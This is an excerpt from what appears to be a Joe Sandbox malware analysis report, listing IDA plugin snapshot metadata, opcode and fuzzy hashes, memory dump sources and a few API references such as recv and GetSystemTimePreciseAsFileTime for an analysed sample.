                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 782971cf22acf918bb2b4d24a8a83b8bb4af0d5e2f15e0b5d360e06cc86faafa
                                                                                                                                                                                                                                          • Instruction ID: 5f2e47ae788e84587da667980b7aa61a5d1d11215ebe5c78a8deb3dc14a83270
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 782971cf22acf918bb2b4d24a8a83b8bb4af0d5e2f15e0b5d360e06cc86faafa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C601F5F728CA15FE66C6A5C21B516F67A7AA597730370C02EF00BD5002F19117557AB2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2252627762.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9897e90b177ba6f98d737df487598df1f18835182af588581546a63724fa691b
                                                                                                                                                                                                                                          • Instruction ID: 3c7a6da468fe76622ab180760189ff356360cfbdfdee9e86be0f7f5027def333
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9897e90b177ba6f98d737df487598df1f18835182af588581546a63724fa691b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4CF0B4FB38CA14FD25CAA5C217A15B63F76E6A7730770C02EF14BC5102B1A067517AE2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2252627762.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: fdcbfecbb83ceb102b7b691136224e9e4df946a7a5135f8014fe3573df26f936
                                                                                                                                                                                                                                          • Instruction ID: 1c71ea0a82181b9d56af7d7caf786046d53be1899bd1131b406bdb8e1f745174
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fdcbfecbb83ceb102b7b691136224e9e4df946a7a5135f8014fe3573df26f936
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37F024F738CA24ED25CAAAC216A05B67A35A6A6730371C12EF087D0002B55067517AB2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2252627762.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e6ec260ba31a1075c11f77cc731621e0a6a7fed23e4afa91c9a42829b6339ab3
                                                                                                                                                                                                                                          • Instruction ID: 62cf0adcc922243deb660d72015e5e401ca177a119b5895bf6583d430f8eb8f4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6ec260ba31a1075c11f77cc731621e0a6a7fed23e4afa91c9a42829b6339ab3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FF050F734CA14DE61C591D22AA12B57775A7A6B30370C02DF44BC2142B4A4265276B3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2252627762.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 17a5e21516b769333fc5dc026786344f6b8d408ce2439de879fc14d1e68f4ca7
                                                                                                                                                                                                                                          • Instruction ID: 32935ee9b18b822e6757bf64a74f4e10af593c186a53ae9b893bc035f6438005
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17a5e21516b769333fc5dc026786344f6b8d408ce2439de879fc14d1e68f4ca7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A9F0E9F738DA51DD15C9A1D227506B57F74A593730371C01FE047C4502F154629676E2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2252627762.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 96ec9b90d7b7ce79429e8cec8e7ec5ac3cfbe4e4532ca0a6698516becf559230
                                                                                                                                                                                                                                          • Instruction ID: 8dc78e63750745bbfa07120c682e6a2c49ab9bcc5e07cbbaec9182eaf841a215
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 96ec9b90d7b7ce79429e8cec8e7ec5ac3cfbe4e4532ca0a6698516becf559230
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48F02BF738CA25ED21C9A1D216606767A78A5A7730372C02FF047D5042B454265536F3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2252627762.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 47ef2ca36f87bda86afd8f33acee8bcf79ebb78b4ff15d8034ccda6c4d76a0ba
                                                                                                                                                                                                                                          • Instruction ID: a293a49340b1154a0cdccffbad52d5f7ccaaaaf2e6ba5949129bb737251348b8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47ef2ca36f87bda86afd8f33acee8bcf79ebb78b4ff15d8034ccda6c4d76a0ba
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2E068F734C260EE21C292D316606B63B74B5A3330370C06EF087C0001B014174677F2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2252627762.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b96459c62ad6f98ede7ab16756f31e4d91248e8841322615e7421588bea54ecc
                                                                                                                                                                                                                                          • Instruction ID: b9857f3194f0f6baedd7671b03681f70dd0e20a201c4bf338f1f68a332c46a96
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b96459c62ad6f98ede7ab16756f31e4d91248e8841322615e7421588bea54ecc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0E0DFFB38CA24ED21C5A1D22A64A767AB4B6A37303B1C06EF087C0042B554279676F2
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2252627762.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 878374a7240f354023d98661bbc0140ff71763f19fb01486e90ed066cdf3c05f
                                                                                                                                                                                                                                          • Instruction ID: 49e4073629a03e5432f590d0e89e967e557b0f690081ebc8041b8dec9c87d598
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 878374a7240f354023d98661bbc0140ff71763f19fb01486e90ed066cdf3c05f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28E0227A10C261EED2C291E215556767FB0AB93730B21C0AFB0C380082E458076BB3E3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2252627762.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f83d9b99e0720810b17b72ba84b3dd7ff389cdb8ebcaa6e284b09a65317412bb
                                                                                                                                                                                                                                          • Instruction ID: a5bc30d233adc4a823a3a670feaef63fb6444b8d0f23a2fe8640171bc2df0ab0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f83d9b99e0720810b17b72ba84b3dd7ff389cdb8ebcaa6e284b09a65317412bb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68E0D8F725C154DD56C6A5E225601B53BB19697331771C16FA0C7C1046B4202256A7E6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2252627762.0000000004AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_4ac0000_file.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9beb22e124d58e4d06f263889298c5da49c1d724cac68f803ccfd85b05b99a2d
                                                                                                                                                                                                                                          • Instruction ID: 7319781731a75d9e287cb8d1f00bbd2cc62dd4f81677701091848cd9f49155b1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9beb22e124d58e4d06f263889298c5da49c1d724cac68f803ccfd85b05b99a2d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BDE0D8BB24C914DE52C1D6C255505367AB0F796720760C09EF0D3C6040F5281661B7E3
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • recv.WS2_32(?,?,00000004,00000000), ref: 0026E10B
                                                                                                                                                                                                                                          • recv.WS2_32(?,?,00000008,00000000), ref: 0026E140
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: recv
                                                                                                                                                                                                                                          • String ID: c13L
                                                                                                                                                                                                                                          • API String ID: 1507349165-2793365725
                                                                                                                                                                                                                                          • Opcode ID: 0336b5b429e345ccdbea76f620a6df338f42577d8afe955785606ffbc428ce42
                                                                                                                                                                                                                                          • Instruction ID: 31513b382bc740353f3d53b1cf563cca291725b609a1267373d2030378cbef10
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0336b5b429e345ccdbea76f620a6df338f42577d8afe955785606ffbc428ce42
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1331E771A102589BDB20CB68DC89FAB77BCEB09724F514625E914E72D1CA74AC948BA0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetSystemTimePreciseAsFileTime.KERNEL32(?,0027CF52,?,00000003,00000003,?,0027CF87,?,?,?,00000003,00000003,?,0027C4FD,00262FB9,00000001), ref: 0027CC03
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_260000_file.jbxd
Yara matches
Similarity
• API ID: Time$FilePreciseSystem
• String ID:
• API String ID: 1802150274-0
• Opcode ID: 0ce4fd0fe6df2646e4f566fb28189be470dc13732ad841fdbfff824a7987aa68
• Instruction ID: 4cdc1e693310c1be7df93d00f5022166925ad0aaeb135f0dfe457a1942c0f6b4
• Opcode Fuzzy Hash: 0ce4fd0fe6df2646e4f566fb28189be470dc13732ad841fdbfff824a7987aa68
• Instruction Fuzzy Hash: 5AD02232512138A38A232BA4FC088ADBB4C8F04B24300411AED0C13220CA60BCD04BD0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_260000_file.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: c13L
                                                                                                                                                                                                                                          • API String ID: 0-2793365725
                                                                                                                                                                                                                                          • Opcode ID: e1abfd79dfa763aa247c0788bf68ad9709fc0d68faf6bbd8d0840de910f2548a
                                                                                                                                                                                                                                          • Instruction ID: 6119aaee65c8b3ccdb5673beda6ee222545289604682cb3fe65ca90d4b79f7e1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1abfd79dfa763aa247c0788bf68ad9709fc0d68faf6bbd8d0840de910f2548a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A812470E10246CFDB15DF68D890BEEBBF5FB1A300F15026AD890A7352C7359999CBA0
Memory Dump Source
• Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
• Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246375725.000000000045D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246391924.000000000045E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246407529.0000000000461000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246420883.0000000000462000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246435523.000000000046B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246450285.0000000000472000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246467590.0000000000484000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246481169.0000000000485000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246496664.0000000000486000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246521083.0000000000487000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246574589.0000000000493000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246670011.000000000049D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246687981.00000000004B9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246700751.00000000004C2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246717295.00000000004CF000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246740921.00000000004D2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246758025.00000000004D3000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246777646.00000000004D5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246800494.00000000004DE000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246817975.00000000004DF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246830145.00000000004E0000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246844988.00000000004E3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246856860.00000000004EA000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246868633.00000000004EF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246879270.00000000004F0000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246889724.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246904342.00000000004F3000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2247007513.00000000004FB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2247050358.0000000000512000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2247336648.0000000000514000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2248037647.000000000051D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2248131120.000000000051E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2248131120.000000000053B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2249336954.0000000000569000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2249401509.000000000056A000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2249671405.000000000056F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2250058723.0000000000571000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2250098533.000000000057E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2250134047.0000000000580000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_260000_file.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 40b0c0e64286096670790b90c987df0bca18dc5d6b63eef7cc6dc35688c7b683
• Instruction ID: 8594b81e0442ec20e3b9a4ea522cbed3ea2289e2e6fed8276b5f7e273a940584
• Opcode Fuzzy Hash: 40b0c0e64286096670790b90c987df0bca18dc5d6b63eef7cc6dc35688c7b683
• Instruction Fuzzy Hash: 792250B3F515144BDB4CCB9DDCA27EDB2E3AFD8218B0E803DA40AE3345EA79D9158644
Memory Dump Source
• Source File: 00000000.00000002.2246085921.0000000000261000.00000040.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true
• Associated: 00000000.00000002.2246049309.0000000000260000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246085921.00000000002C2000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246156943.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246171958.00000000002CB000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246187307.00000000002D7000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246280736.0000000000431000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246296195.0000000000433000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246315142.000000000044C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246329526.000000000044E000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246342884.000000000044F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2246342884.0000000000459000.00000040.00000001.01000000.00000003.sdmp
